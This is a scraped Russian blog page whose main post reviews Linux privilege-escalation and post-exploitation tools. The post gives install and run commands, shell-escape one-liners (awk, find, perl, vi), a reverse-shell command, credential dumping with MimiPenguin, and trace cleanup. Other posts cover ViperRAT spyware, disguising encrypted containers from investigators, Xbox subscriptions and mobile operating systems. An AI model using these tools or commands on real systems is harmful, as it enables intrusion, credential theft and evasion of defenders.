Повышение привилегий в Linux


Наш telegram канал : @Save and betray

Вступай в наши ряды


  1. Эскалация — (повышение привилегий) — это эксплуатация уязвимостей в операционной системе или прикладном ПО, позволяющая получить доступ к ресурсам, которые обычно защищены от определенного пользователя. В результате хакер имеет больше привилегий, чем предполагалось разработчиком или системным администратором, и может выполнять несанкционированные действия в целевой системе.

PXEnum

Основная задача данного скрипта — функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Скрипт создан для настоящих лентяев. Хорошо, если высказаться более политкорректно, то «для тех, кто ценит свое время». Встроенные команды позволяют также угонять хеши паролей, содержание директорий, все сведения о системе, наличие application-серверов, приложений, соединений, юзеров.

Для запуска скрипта не требуются права root, он работает в стандартном терминале. Перед установкой скачиваем инструмент с помощью Wget:


$ wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh

Установка PXEnum:


$ git clone https://github.com/shawnduong/PXEnum.git

$ cd PXEnum/

$ chmod +x PXEnum.sh

$ bash PXEnum.sh

Другой вариант запуска PXEnum:

$ sh PXEnum.sh


MIDA Multitool

Другой интересный инструмент — MIDA Multitool, созданный на базе менее популярных собратьев SysEnum и RootHelper, но предлагающий гораздо больше возможностей.

По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:

  • SysEnum — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;
  • RootHelper — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.

Установка MIDA Multitool в систему с GitHub:

$ git clone https://github.com/NullArray/Bash-Kit-Multitool

$ cd Bash-Kit-Multitool

$ chmod +x bashkit.sh

Запускаем скрипта MIDA Multitool :

$ /.bashkit.sh

Вывод некоторой информации по системе:

MimiPenguin

Очень хорошо известный в узких кругах пентестеров скрипт под названием MimiPenguin. Основная задача утилиты — сброс пароля на вход в систему от текущего пользователя Linux (то есть непривилегированного). В некотором роде это аналог утилиты mimikatz для дампа пароля в Windows-системах.

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.

Установка MimiPenguin с репозитория GitHub:


$ git clone https://github.com/huntergregal/mimipenguin

Если у вас еще не установлен GitHub, то используйте эти команды:

$ apt install git       // Debian/Ubuntu systems

$ yum install git       // RHEL/CentOS systems

Переходим в директорию MimiPenguin и запускаем скрипт:

$ cd mimipenguin

$ ls –a

$ chmod +x mimipenguin.sh

$ ./mimipenguin.sh

Auto-Root-Exploit

Сингловый скрипт, созданный для одной-единственной цели — получить права root на текущую учетную запись, под которой он был запущен с помощью эксплуатации известных багов. Поддерживает версии ядра, начиная с Linux Kernel 2.6 и до 4.8.0-41-generic, а также часть ОС семейства *BSD.

Установка Auto-Root-Exploit в систему:

$ git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit

$ cd Auto-Root-Exploit

$ chmod +x autoroot.sh

Проверка версии ядра (для того чтобы выбрать нужный эксплоит-пак):

<span class="pln">$ uname </span><span class="pun">–</span><span class="pln">a</span>

Использование Auto-Root-Exploit:

$ bash autoroot.sh N

for kernel version 2.6 all

bash autoroot.sh 2

for kernel version 3 all

bash autoroot.sh 3

for kernel version 4 all

bash autoroot.sh 4

for freebsd & openbsd all

bash autoroot.sh bsd

for apple macos all

bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all

bash autoroot.sh all

LARE

И напоследок еще один довольно простой скрипт, который позволяет с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплоиты для получения root-прав для версий ядра Linux Kernel v2.6 — v4.8.

Кстати, этот инструмент очень часто находит свое применение в различных War Games и CTF-соревнованиях, например hackthebox.gr, или даже на сертификационном экзамене OSCP.

Устанавка LARE в систему:

$ git clone https://github.com/EnigmaDimitri/LARE && cd LARE

$ chmod +x LARA.sh

Пример локального запуска LARE:

$ LARE.sh -a

или

$ ./LARE.sh -a

Запуск скрипта на целевой машине в сети:

$ LARE.sh -l [Attackers-IP]

Запуск на машине с подключением к базе данных эксплоитов на GitHub:

$ LARE.sh -l or ./LARE.sh -l

Проверка и защита системы от техник постэксплуатации

Кроме традиционных мер, таких как установка патчей и минимизация привилегий, безопасность системы дополнительно обеспечивают специальные утилиты для проверки системы. В противовес популярному мнению (согласно которому к постэксплуатации ведут только зиродеи или устаревший софт) к грандиозному факапу ведут и ошибки конфигурации — предоставление избыточных прав доступа, пароли по умолчанию, системные каталоги и файлы в общем доступе, выключенные опции безопасности в программах, работающих из коробки, и прочие огрехи.

Ниже будут представлены утилиты (скрипты) быстрого анализа системы и проверки ее на факт выполнения несанкционированных и потенциально опасных действий со стороны непривилегированных пользователей.

Bashark

Bashark — популярный скрипт, который помогает пентестерам и исследователям в области информационной безопасности тестить возможности управления системой после успешной эксплуатации.

Фирменные фичи и возможности, заявленные разработчиком:

  • быстрый запуск, мгновенная реакция;
  • мультиплатформенность: Unix, OS X, Solaris и другие;
  • отсутствие зависимостей от версии ядра ОС или установленных пакетов;
  • иммунитет к эвристическому и поведенческому анализу (обход средств защиты);
  • встроенные алиасы к популярным командам;
  • расширение стандартной оболочки bash-командами для постэксплуатации;
  • процедура заметания следов после завершения работы (Stealthy);
  • расширяемость — возможность дописывать свои команды и юзать из терминала;
  • поддержка табуляции при наборе команд.

Итак, качаем скрипт Bashark с помощью Git:

1

$ git clone https://github.com/TheSecondSun/Bashark.git

Переходим в соответствующую директорию и даем права на выполнение:

$ cd Bashark

$ chmod +x bashark.sh

Запускаем Bashark:

$ ./bashark.sh

В чем еще уникальность Bashark? С помощью опции portscan мы можем сканировать внутреннюю сетку из-под одной скомпрометированной машины. Чтобы получить все файлы конфигурации с другой взломанной машины на Linux, можно использовать опцию getconf. Команда позволяет извлекать все файлы конфигурации, хранящиеся в каталоге /etc. Точно так же легко и просто можно использовать опцию getprem для просмотра всех двоичных файлов на целевой системе.

Сканируем удаленную машину с помощью Bashark:

$ portscan <target’s IP>

Получаем конфиги:

$ getconf

Получаем файлы:

$ getprem

Получаем реверс-шелл:

$ revshell <target’s IP> <Port 31337>

Еще одна приятная мелочь — это фича самоочистки (удаления следов работы в системе). Например, если вы создавали файлы или каталоги во время работы в контексте Bashark с помощью опции -t (создать файл) или -mkd (создать каталог), подпрограмма quit (то есть завершение работы) будет активировать директиву cleanup, затирающую все следы присутствия в системе.

LinEnum

Данный скрипт представляет собой экспресс-тест по таким позициям, как Kernel and distribution release details, System Information, Privileged access, Jobs/Tasks, Services, Default/Weak Credentials, Searches, Platform/software specific tests.

Скрипт LinEnum успешно протестирован на различных версиях дистрибутивов Ubuntu, Debian, Red Hat и CentOS. Программа не ищет и не пытается выполнять эксплоиты, как некоторые другие аналогичные рассмотренные в статье инструменты повышения привилегий в Linux, — она только собирает информацию и делает проверки возможных векторов эскалации привилегий.

Установка LinEnum в систему:

1

2

$ git clone https://github.com/rebootuser/LinEnum

$ cd LinEnum/

Простой запуск с вызовом списка ключей:

1

$ ./LinEnum.sh

Пример запуска LinEnum с опциями (ключами):

1

$ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

Описание ключей LinEnum:

  • -k — ввести ключевое слово
  • -e — указать директорию для экспорта отчета
  • -t — включить в отчет «длинные» тесты (дополнительные тесты)
  • -s — произвести проверку эскалации текущей учетки sudo perms
  • -r — задать имя итогового отчета
  • -h — вызвать встроенную справку по программе
  • -k — опциональный переключатель, с которым можно указать ключевое слово для поиска файлов по нескольким расширениям

Запуск без опций означает ограниченное сканирование без файла вывода.

LinuxPrivChecker

Еще один полезный в эскалации привилегий скрипт, написанный на Python. Этот инструмент предназначен для локального выполнения в системе с целью перечисления базовой системной информации и поиска общих векторов повышения привилегий, таких как общедоступные файлы, неверные конфигурации демонов и библиотек, пароли, хранимые в виде открытого текста, и баги, соответствующие наиболее популярным эксплоитам.

Основные области проверки:

  • основная информация о системе (ОС, ядро, имя системы и так далее);
  • информация о сети (ifconfig, route, netstat и т. д.);
  • разная информация о файловой системе (mount, fstab, cron jobs);
  • информация о пользователе (текущий пользователь, все пользователи, суперпользователи, история команд);
  • права доступа к файлам и каталогам (доступные для записи файлы/каталоги, файлы suid, корневой домашний каталог);
  • файлы, содержащие незашифрованные пароли;
  • интересные файлы, процессы и приложения (все процессы и пакеты, все процессы, запускаемые пользователем root и связанные пакеты, версия sudo, файл конфигурации Apache);
  • все установленные языки и инструменты (GCC, Perl, Python, Nmap, Netcat, Wget, FTP и так далее);
  • все соответствующие эксплоиты повышения привилегий (с использованием базы данных эксплоитов с применимыми версиями ядра, пакетами/процессами программного обеспечения).

Проверка на эскалацию привилегий производится в следующих программах:


nmap

-interactive

vi

:!bash

:set shell=/bin/bash:shell

awk

awk ‘BEGIN {system(“/bin/bash”)}’

find

find / -exec /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’ \;

perl

perl -e ‘exec “/bin/bash”;’

Итак, качаем скрипт LinuxPrivChecker:

1

$ wget http://www.securitysift.com/download/linuxprivchecker.py

Запускаем LinuxPrivChecker с помощью всего лишь одной команды:

1

2

$ chmod +x linuxprivchecker.py

$ ./linuxprivchecker.py

Или другой вариант запуска LinuxPrivChecker:

1

$ python linuxprivchecker.py


Unix-privesc-check

Unix-privesc-checker — это мощный скрипт, работающий в Unix-системах (протестирован на Solaris 9, HPUX 11, различных Linux 3.х и FreeBSD 6.2+). После запуска скрипт пытается найти неправильные твики конфигурации системы, процессы, которые могут позволить локальным непривилегированным пользователям повышать привилегии других юзеров или получать доступ к локальным приложениям, например базам данных MySQL.

Основные области проверки:

  • слабые пароли и значения по умолчанию;
  • конфигурация стека IP (без ненужного использования IPv6, без форвардинга IP-пакетов и так далее);
  • некорректные права доступа к файлам (чтение/изменение конфиденциальных данных);
  • настройка локальных приложений (просмотр sshd_confighttpd.conf);
  • другие полезные вещи (например, удаленное ведение журнала, использование небезопасных протоколов TCP/IP).

Основное внимание разработчики данного скрипта уделяют проверке на предмет распространенных ошибок в конфигурации системы и некорректно настроенных разрешений на доступ к директориям и файлам. Важно отметить, что скрипт не проверяет наличие отсутствующих патчей для ядра ОС или установленных пакетов, но это и не его задача, ведь для ее решения существуют более сложные утилиты, о которых мы рассказывали в нашем предыдущем материале про аудит Linux.

Скрипт может запускаться как от имени обычного пользователя, так и от имени root. В последнем случае у скрипта больше привилегий и он может выполнить ряд тестов, недоступных из-под учетной записи непривилегированного пользователя. Для регулярного мониторинга запуск скрипта можно прописать как задание cron.

Пример запуска скрипта Unix-privesc-check:

1

$ ./unix-privesc-check > output.txt

April 11, 2019
0
17

Хакеры использовали вредоносное ПО, чтобы шпионить за Израильскими Военнослужащими


Наш telegram канал : @Save and betray

Вступай в наши ряды




Как военнослужащие смогли допустить такое?

По данным антивирусных компаний, сотрудники Армии обороны Израиля были взломаны с помощью методов, всеми нами любимой социальной инженерии — где солдаты были прикормлены через мессенджер Facebook и других социальных сетях. Хакеры, выдавали себя за привлекательных женщин из разных стран, как Канада, Германия и Швейцария,Мехико.

Далее «девушки» отказывались, продолжать диалог в соц. сетях, под предлогом, что мол «не удобно ей писать, через Facebook» или же «нету возможности писать через соц сети». Им скидывали приложения, под видом SR Chat. А те же, с удовольствием, не думая скачали приложение, лишь бы продолжить диалог с сочной латинкой(например).

Вредоносная программа также распространяется с помощью «капельницы», скрытая в других приложениях на Android, включая игры в бильярд, израильские Песни, и переход к iOS-приложения, которые являются общими для израильских граждан и доступна в магазине Google Play.

Затем, сразу же приходило уведомление обновления для одного из уже установленных приложений, таких как whatsapp.

Это, в свою очередь, позволило злоумышленникам выполнить по командам спрос, позволяя им контроль микрофон и камеры телефона, подслушивать разговоры солдат, и смотреть видео с камер.

Кроме этого, ViperRAT (вредоносная программа) собирает широкий спектр данных с вашего устройства, включая геолокацию, журнал звонков, личные фотографии, SMS-сообщения, информацию, сотовую связь, мобильный интернет, метаданные устройства, просмотр интернет-страниц, и история скаченных приложений.



По данным исследователей, хакеры смогли успешно создать широкую кампанию кибер шпионажа, приносящая ущерб десяткам мобильным устройствам от Samsung, HTC, LG и Huawei, принадлежащих к более чем 100 израильских солдат.

ViperRAT атаки начались в июле и продолжаются по сей день, по мнению исследователей из Лаборатории Касперского.

April 9, 2019
0
12

Азы безопасности: шифрование данных


Наш telegram канал : @Save and betray

Вступай в наши ряды


Переход к использованию криптоконтейнеров


В рамках этой статьи поговорим о практике использования шифрования для защиты данных. Если вам пока сложно воспринимать слово криптоконтейнер, читайте вместо него «надёжно зашифрованная папка с паролем, где можно хранить и редактировать файлы». Криптоконтейнер — это надежный сейф внутри вашего компьютера.

Я на своем примере расскажу о начале применения криптоконтейнеров, а вы, опираясь на мой опыт, настроите работу криптоконтейнеров на компьютере или мобильном устройстве. Как у многих из вас, файлы у меня были разложены по папкам.

Я всегда пытался навести порядок на своем компьютере: у меня была папка «Работа» с множеством вложенных папок, была папка «Учёба» с образовательными материалами, были различные папки с фотографиями, видео и всяким хламом. Была, конечно, и папка XXX, предусмотрительно переименованная в «Лекции».

Общий объём файлов составлял порядка 112 ГБ. При переходе к использованию криптоконтейнеров я разделил файлы на три группы.

В первую группу вошли очень ценные для меня файлы, но которые я не использую ежедневно. Во вторую вошли важные файлы, которые используются мной каждый день для работы или учебы. В третью вошёл всякий хлам, который я даже не думал как-то защищать и перенёс в криптоконтейнер только ради общего порядка. Есть одно общее правило: чем меньше у вас файлов в криптоконтейнере, тем лучше с точки зрения безопасности. Когда вы монтируете криптоконтейнер, в котором лежит десять файлов, то открываете доступ ко всем десяти из-за одного. В идеале на каждый файл должен быть отдельный криптоконтейнер, но на практике это несбыточная утопия. Когда файлы находятся в несмонтированном криптоконтейнере, они надёжно защищены. Забросят ли вам на компьютер трояна или, вынеся дверь, проведут криминалистический анализ — всё это бесполезно при надёжном пароле. Если, конечно, вы сами не выдадите его, или он у вас не сохранен в txt документе на рабочем столе. О способах взлома криптоконтейров мы подробно расскажем в заключительном параграфе.

Думаю, стоит детальнее объяснить, что такое смонтированный криптоконтейнер. Представьте, что криптоконтейнер — это зашифрованная папка с паролем. Вы ввели пароль и пользуетесь находящимися там файлами, потом вы закрыли папку, и для доступа к данным снова нужен пароль. В состоянии, когда вы пароль уже ввели, и доступ открыт, троянская программа, попавшая на ваш компьютер, или третье лицо, получившее доступ к компьютеру, имеют доступ и к файлам. Это называется смонтированным криптоконтейнером, а сам процесс введения пароля и открытие доступа — монтирование. Криптоконтейнер можно сравнить с сейфом. Сейф защищён, только когда закрыт. В открытом состоянии любой может получить доступ к его содержимому. Хранить вещи в открытом сейфе ничуть не безопаснее, нежели на столе рядом с ним.

Совет: создавайте как можно больше криптоконтейнеров. Хранить все данные в одном криптоконтейнере небезопасно. Вернёмся к моим криптоконтейнерам. Я создал криптоконтейнеры, создал резервную копию файлов (на всякий случай) и перенёс файлы в созданные криптоконтейнеры. Весь хаос папок и файлов на моём жёстком диске преобразовался в три надёжно зашифрованных файла. Всё просто: вы продумываете, сколько криптоконтейнеров вам понадобится, создаёте их и переносите в них файлы. Перенос данных в криптоконтейнеры — один из важнейших шагов на пути к построению защищённой системы.

Совет: храните всю информацию только в криптоконтейнерах. У криптоконтейнера есть ещё одно преимущество. Например, вам надо экстренно уничтожить ваши данные, занимающие 100 ГБ жесткого диска. Сколько времени будет происходить удаление их безопасным способом? В зависимости от возможностей жёсткого диска это может занять до 30 минут.

А если эти 100 ГБ будут в криптоконтейнере, то с помощью технологии CryptoCrash данные можно уничтожить за несколько секунд. В следующих параграфах мы познакомим вас с программами, позволяющими создавать и использовать криптоконтейнеры.

История TrueCrypt

TrueCrypt — почти образцовая программа шифрования папок и файлов. Первая версия программы вышла в свет ещё в далеком 2004 году, и на тот момент TrueCrypt оказалась фактически единственной программой с открытым исходным кодом для шифрования «на лету». Что значит «на лету»? Обычные программы для работы с зашифрованными файлами требуют сначала расшифровать файл или папку, выполнив необходимые манипуляции с данными, затем создать зашифрованную копию файла или папки, а незашифрованный оригинал удалить. TrueCrypt позволяла создавать зашифрованную папку, указав в программе пароль, и работать с зашифрованной папкой, шифруя и расшифровывая данные «на лету». С 2004 по 2014 программа TrueCrypt регулярно обновлялась. Некоторые функции исключались. Так, например, была убрана поддержка дискет, когда этот формат канул в лету, удалялись и некоторые протоколы шифрования.

С развитием компьютерной индустрии совершенствовались и технологии взлома методов шифрования, из-за этого ряд протоколов перестал считаться надёжным. Так, в последней, 7-й, версии TrueCrypt вы уже не увидите протоколов шифрования с размером блока в 64 бита (Тройной DES, Blowfish, CAST5).

Десять лет проект TrueCrypt активно развивался и превратился в фундаментальный софт для защиты данных. Всё это время имена разработчиков программы оставались загадкой, что породило ряд слухов о причастности спецслужб к разработке приложения.

Некоторые говорили, что программа разработана ФБР, другие утверждали, что если и не ФБР, то в софте непременно есть закладки. Популярность TrueCrypt росла, пока весной 2014 года не произошло необъяснимое событие, повергшее интернет-общественность в шок. 28 мая 2014 проект TrueCrypt был закрыт. Точные причины закрытия проекта никому не известны по сей день. Сами разработчики сообщили на официальном сайте, что использование TrueCrypt небезопасно, и предложили переходить на BitLocker, который всегда высмеивали. Есть много версий и догадок о случившемся, мы приведём основные.

Первая версия гласит, что разработчикам угрожали спецслужбы, вторая — что их переманили на работу в Microsoft, чем и объясняется реклама BitLocker, третья — им надоело продвигать и поддерживать проект, не приносящий денег, четвертая — они действительно обнаружили в продукте критическую уязвимость, которую не способны были исправить. Интернет-сообщество погрузилось в споры о безопасности TrueCrypt, и одному Богу известно, сколько бы они продлились, если бы к началу апреля 2015 не был завершен независимый аудит TrueCrypt, на который было собрано свыше 60 000 USD пожертвований. Он не выявил никаких уязвимостей или серьёзных недостатков в архитектуре приложения и показал, что TrueCrypt является хорошо спроектированной криптографической программой. Источник: здесь. Мы считаем, что, TrueCrypt 7.1 надежен, и закрытие проекта не связано с его безопасностью. А вот хронологически последняя версия программы (7.2) не является безопасной и полнофункциональной, по крайней мере, об этом предупреждают сами разработчики, и это мнение разделяют многие эксперты.

Потому мы рекомендуем использовать последнюю стабильную и надежную версию — TrueCrypt 7.1а. TrueCrypt

Недоказуемость криптоконтенейра

У TrueCrypt масса преимуществ, одно из которых заключается в невозможности идентифицировать зашифрованный контейнер. Даже если недоброжелатели получат доступ к вашему диску, укажут на криптоконтейнер и скажут «это — криптоконтейнер», вы смело можете сказать, что это не так, что это какой-то неизвестный вам файл. Доказать обратное невозможно. Разумеется, вы можете «случайно» прищемить палец дверью и тогда не только признаете в файле криптоконтейнер, но и вспомните пароль. Но и от этого есть защита, о которой мы расскажем в главе, посвященной антикриминалистике, а сейчас просто запомните, что доказать наличие криптоконтейнера исследованием файла невозможно. Опираясь на это, мы рекомендуем вам называть свои контейнеры как-нибудь нейтрально и пробовать их маскировать под программные файлы. Например, открываем у себя папку с менеджером паролей KeePassX и видим какие-то непонятные файлы с расширением *.dll. Создавая криптоконтейнер, назовем его LsQN7.dll и положим в эту папку. Только мы будем знать, что LsQN7.dll на самом деле криптоконтейнер. После создания криптоконтейнера и размещения его в папке KeePassX. Вы видите отличия? Только дата? Менять дату мы вас научим в части, посвященной маскировке криптокойнтейнеров. Но не спешите создавать криптоконтейнер. Совет Называйте криптоконтейнеры так, чтобы название не выдавало криптоконтейнер. Указывайте у криптоконтейнеров расширение *.dat и размещайте в папке с другими файлами с расширением *.dat.

Хотим предупредить, что наличие на рабочем компьютере TrueCrypt действует на некоторых недоброжелателей, как красная тряпка на быка. У вас сразу начинают искать криптоконтейнеры, требовать пароли, а вам приписывать различные криминальные намерения от торговли ПАВ до поддержки международного терроризма.

VeraCrypt

Вот уже четыре года как проект TrueCrypt — легендарный софт для шифрования данных — не поддерживается разработчиками. Но TrueCrypt — программа с открытым исходным кодом, и любой на его основе может начать разрабатывать свой продукт. Именно так поступил француз Мунир Идрасси, летом 2013 представив миру проект VeraCrypt. Основной идей было создание более безопасного, чем TrueCrypt, решения. Например, в TrueCrypt использовалась довольно посредственная генерация ключа, по мнению экспертов, не способная обеспечить высокий уровень защиты против имеющихся в арсенале спецслужб компьютерных мощностей.

VeraCrypt предложил ощутимо более устойчивое против брутфорса решение, о котором мы подробнее расскажем, когда дойдем до сравнения программ. При «живом» TrueCrypt форки не пользовались популярностью; все изменилось, когда весной 2014 года разработчики TrueCrypt сообщили о прекращении поддержки проекта. Тогда о VeraCrypt заговорили как о надежной альтернативе TrueCrypt (хотя были и другие форки, такие как GostCrypt, CipherShed например). Часть пользователей TrueCrypt сразу перешла на использование VeraCrypt, а часть осталась верна TrueCrypt.

Многим понравился VeraCrypt, однако нашлось и немало критиков. В сети активно поддерживалась версия, что VeraCrypt — проект спецслужб, имеющий закладки. Многие относятся к форкам с большой долей скептицизма, этого же мнения придерживаются и разработчики TrueCrypt, считая форк опасным. В основе их опасения лежит убеждение в неспособности сторонних разработчиков до конца разобраться с их кодом, и, как вы узнаете дальше, эти опасения были не напрасны.

VeraCrypt vs TrueCrypt

Давайте сравним TrueCrypt и VeraCrypt. Эти программы очень близки по функционалу и дизайну, что неудивительно для форка и оригинала, потому мы сравним быстродействие и безопасность. Скорость монтирования криптоконтейнеров.

Первый негативный момент, с которым сталкиваются пользователи TrueCrypt, первый раз попробовав VeraCrypt, — время монтирования криптоконтейнера. Когда в TrueCrypt вы указываете верный пароль, время ожидания до доступа к зашифрованным данным составляет на современном компьютере десятые доли секунды. При использовании VeraCrypt ждать приходится заметно дольше. TrueCrypt vs VeraCrypt

Устойчивость к брутфорсу

Брутфос, если говорить простыми словами, — попытка подобрать пароль (ключ) путем перебора всех возможных вариантов. Современные суперкомпьютеры, имеющиеся в распоряжении спецслужб, умеют перебирать варианты очень быстро. За счёт более совершенного метода генерации ключей VeraCrypt от 10 до 300 раз более устойчив к атакам прямого перебора. Для многих это самое главное преимущество VeraCrypt. Поддержка со стороны разработчиков. TrueCrypt уже не поддерживается разработчиками, используемые решения устаревают с каждым днем, потенциальные уязвимости не исправляются. Это безусловно плюс для VeraCrypt, который активно поддерживается и развивается.

TrueCrypt vs VeraCrypt: уязвимости

Казалось бы, наличие поддержки со стороны разработчиков должно было обеспечить VeraCrypt преимущество, но на самом деле все наоборот. В главе, посвященной TrueCrypt, мы рассказывали о проведенном аудите программы, который не выявил критических уязвимостей. Подобному аудиту было подвергнуто и программное обеспечение VeraCrypt. По результатам аудита были выявлены 36 уязвимостей, 8 из которых получили статус критических, 3 — умеренных и 15 — незначительных. 8 критических уязвимостей в таком приложении нельзя назвать иначе как катастрофа. С полной версией отчета об аудите вы можете познакомиться по этой ссылке. В настоящий момент большинство обнаруженных уязвимостей успешно исправлены, однако некоторые из них требуют существенной переработки архитектуры и до сих пор присутствуют в VeraCrypt.

TrueCrypt vs VeraCrypt: уровень команды разработчиков

Как было сказано ранее, аудит VeraCrypt обнаружил 8 критических уязвимостей, а при аудите TrueCrypt не было обнаружено ни одной. Это вызывает опасения по поводу уровня команды разработчиков VeraCrypt. У нас нет никаких сомнений, что программное обеспечение TrueCrypt разрабатывалось более компетентными специалистами.

Допустим, обнаруженные в ходе аудита 8 критических уязвимостей в VeraCrypt будут закрыты, но где гарантии, что команда разработчиков не допустит еще столько же новых критических уязвимостей? TrueCrypt vs VeraCrypt А какую программу выберете вы?

В нашем противостоянии победил TrueCrypt. Но не все так просто. Вы сами должны все взвесить и принять решение. С одной стороны, TrueCrypt использует устаревающие технологии, уступающие в криптостойкости технологиям VeraCrypt. К тому же TrueCrypt больше не поддерживается разработчиками. С другой стороны, VeraCrypt постоянно обновляется и поддерживает более устойчивые к атакам технологии, но обнаруженные уязвимости и вопросы по поводу уровня команды разработчиков дают повод серьезно задуматься. В группе нашей редакции единого мнения нет, но есть единое решение — параллельное использование двух инструментов. Проще говоря, вы создаете один криптоконтейнер, например, при помощи программного обеспечения TrueCrypt, внутри него создаете второй криптоконтейнер при помощи VeraCrypt и уже в нем размещаете файлы. Такая связка в разы надежнее каждой из программ в отдельности.

April 8, 2019
0
13

Microsoft может объединить подписки Xbox Live и Game Pass в одну общую

У Microsoft на сегодняшний день есть два варианта подписок на игры Xbox — Live Gold и Game Pass. Первая предоставляет возможность играть в многопользовательские игры, доступные на консоли. Также для владельцев «Золотого статуса» доступны 2–4 бесплатных игры ежемесячно. Вторая подписка за ежемесячный взнос предоставляет доступ к обширной библиотеке игр (более сотни на данный момент). Из проектов, недавно добавленных в ассортимент, можно отметить Sea of ​​Thieves и Minecraft

engadget.com

Но теперь сообщается, что компания в скором времени может представить новую подписку Xbox Game Pass Ultimate, которая объединит оба варианта и будет стоить $15 в месяц (цена в России пока не объявлена). Источником выступает инсайдер WalkingCat, который известен своими утечками из внутренней «кухни» Microsoft.


По его словам, участники программы раннего доступа могут получить особую цену на подписку — $1 в месяц вплоть до запуска сервиса.



Есть косвенные подтверждения этой информации. Во-первых, аналитик Дэниел Ахмад (Daniel Ahmad) заявил в обсуждении на Resetera, что компания из Редмонда хочет сделать подписки важным элементом своего бизнеса.


Во-вторых, ранее появилась информация о сроках выхода Xbox One S All-Digital без дисковода. Такое устройство чисто физически сможет загружать игры только из Сети (ну или с флешек, если хакеры смогут взломать прошивку). Как полагают наблюдатели в отрасли, такая консоль будет дешевле обычной. Также не стоит забывать о потоковом сервисе xCloud, который может быть анонсирован на E3 в начале лета. Хотя его и позиционируют как универсальное решение, с помощью которого можно играть на всех устройствах, очевидно, что  Xbox One S All-Digital будет первой на очереди. 

April 7, 2019
0
3

7 мобильных ОС с открытым исходным кодом: могут ли они составить конкуренцию Android?

Наш telegram канал : @Save and betray

Вступай в наши ряды





Лучшие альтернативы Android с открытым исходным кодом

1. Kai OS



Вы знали, что Kai OS претендует на то, чтобы стать третьей крупнейшей мобильной операционной системой в мире? Скорее всего, нет. Что ж, это неудивительно. KaiOS вышла на рынок не так давно — в 2017 году — но за неполные два года стала платформой для огромного количества мобильных телефонов. В чем тут секрет? В отличие от других операционных систем, Kai OS «заточена» не под смартфоны, а под фичерфоны — классические сотовые телефоны, оснащенные продвинутыми опциями. Низкая цена в сочетании с функционалом, присущим «умным» телефонам, обеспечивает фичерфонам достаточно большую популярность.

Будучи форком канувшей в лету Firefox OS (см. ниже), Kai OS также базируется на ядре Linux.Оценить потенциал Kai OS можно по тому факту, что недавно Google инвестировал в эту операционную систему 22 миллиона долларов.

2. Tizen


Опенсорсная мобильная операционная система Tizen поддерживается сообществом Linux Foundation, из-за чего ее часто называют официальной мобильной ОС Linux. Помимо Linux Foundation, Tizen также поддерживают такие техногиганты, как Samsung и Intel. Релиз первого смартфона с ОС Tizen, Samsung Z, состоялся в январе 2015 года (хотя изначально был запланирован на конец 2013-го) на южно-азиатском рынке. К сожалению, большого успеха на рынке Индии Samsung Z не снискал.


Несмотря на то, что операционная система Tizen базируется на ядре Linux, в ней не раз обнаруживали уязвимости. Честно говоря, в будущее данной ОС верится с трудом. Похоже, что рано или поздно Tizen себя изживет.

3. Plasma Mobile


В 2015 году разработчики рабочего стола KDE создали мобильную операционную систему с открытым исходным кодом Plasma Mobile. Приложение основано на ОС Kubuntu и по сути является мобильной версией десктопного пользовательского интерфейса Plasma. При этом Plasma Mobile совместима и с другими операционными системами.

Plasma Mobile работает на Nexus 5 и OnePlus One. Мобильная ОС поддерживает виджеты KDE Plasma и позволяет загружать настольные приложения на смартфоне.

4. postmarketOS


postmarketOS (сокращенно pmOS) — это предконфигурированная и оптимизированная для сенсорного управления операционная система на базе Alpine Linux с собственными программными пакетами, которые можно устанавливать на смартфоны.

Известно, что Android и iOS перестают выпускать обновления для моделей спустя несколько лет. В то же время Linux без проблем работает и на старых компьютерах. Цель postmarketOS — внедрить данный опыт и на мобильной платформе, обеспечив смартфонам 10-летний жизненный цикл.

В настоящее время проект находится на стадии разработки, поэтому воспользоваться преимуществами postmarketOS прямо сейчас, скорее всего, не получится.

5. Librem


Librem — это даже не мобильная операционная система, а безопасный зашифрованный мобильный телефон с открытым исходным кодом, который разработчики Linux-дистрибутива PureOS планируют вывести на рынок в ближайшее время.

Устройство получит оптимизированную для сенсорного управления версию PureOS, Debian, Ubuntu, SUSE, Fedora и даже Arch Linux.

Librem позиционируется как «телефон, по умолчанию ориентированный на безопасность и конфиденциальность». Смартфон работает на свободном и открытом программном обеспечении, на операционной системе GNU+Linux, и его миссия состоит в том, чтобы «создать утопию свободной разработки в противовес огороженным садам других телефонных провайдеров». Будем наблюдать, удастся ли затея.


6. LineageOS


LineageOS — это дистрибутив Android, иначе говоря, — пользовательская прошивка. Операционная система пришла на смену гораздо более успешному Android-дистрибутиву CyanogenMod и является его форком.

Выпущенная в декабре 2016 года, на сегодняшний день LineageOS поддерживает 178 моделей смартфонов, а количество установок операционной системы, по словам разработчиков, достигло 1,7 миллионов.

7. /e/ (eelo)


/e/ (ранее eelo) — это Android-дистрибутив на основе LineageOS от разработчика Mandrake Linux. Цель проекта — создать не привязанную к Google мобильную операционную систему с открытым исходным кодом. Предполагается, что у ОС будет собственное облако и email-сервис. Платформа /e/ должна появиться в стабильной версии в ближайшее время. Название проекта планируется снова изменить.

Sailfish OS [закрытый исходный код]


Когда компания Nokia отказалась от разработки мобильной ОС MeeGo, часть сотрудников решила спасти проект. Предполагалось, что MeeGo будет развивать сообщество Linux Foundation в рамках проекта Tizen, однако последний получил самостоятельное развитие и перестал ассоциироваться с MeeGo. Продолжением MeeGo считается Sailfish OS. В ее основу легла операционная система Mer, ставшая ответвлением MeeGo.

